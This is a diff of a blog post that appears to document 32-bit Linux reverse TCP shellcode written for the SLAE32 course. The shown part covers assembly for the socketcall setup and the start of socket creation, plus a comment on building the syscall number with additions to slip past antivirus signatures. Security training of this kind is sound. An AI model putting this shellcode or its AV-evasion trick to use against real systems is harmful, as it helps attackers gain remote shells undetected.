gulyslae/gulyslae.github.io/_posts/2019-08-04-SLAE32-reverse_tcp.md

     ret

     socketcall2eax:
-    ; place syscall code for socketcall in eax, which is 0x66, no need to zero because i use mov.
-    ; i'm using add to avoid hardcoded 0x66 call, which could be trapped by some AV, when 0x33 is the call acct and looks harmless to me mov al,0x33
+    ; syscall code for socketcall in eax, which is 0x66, no need to zero because of mov ; i'm using add to avoid hardcoded 0x66 call, which could be trapped by some AV, ; when 0x33 is the call acct and looks harmless to me mov al,0x33
     add al,0x33
     ret

     ; main code starts here
     _start:
-    ; start by zeroing eax,ebx. not really needed because registers are clean, but better safe than sorry call zero
+    ; start by zeroing eax,ebx. not really needed because registers are clean, but better ; safe than sorry
+    call zero

     createsocket:
-    ; ----------------------------------------------------------------------------------------
+    ; -----------------------------------------------------------------------------------
     ; purpose     : create a socket
     ; references  : man socket
-    ; description :
-    ; socketcall is the syscall used to work with socket. i'm going to use this syscall to create and connect ; the very first thing i have to do, is to create the socket itself. by reading references, i see that she needs 3 registers:
+    ; description : socketcall is the syscall used to work with socket. i'm going to use ;               this syscall to create and connect ;               the very first thing i have to do, is to create the socket itself.
+    ;               by reading references, i see that she needs 3 registers:
-    ; eax => syscall id 0x66 for socketcall, that will be the same for every socketcall call of course and that's why i created a function on top
-    ; ebx => socket call id, that is 0x1 for socket creation ; ecx => pointer to socket args
+    ; eax => syscall id 0x66 for socketcall, that will be the same for every socketcall call of course and that's why i created a function on top ; ebx => socket call id, that is 0x1 for socket creation ; ecx => pointer to socket args
     ;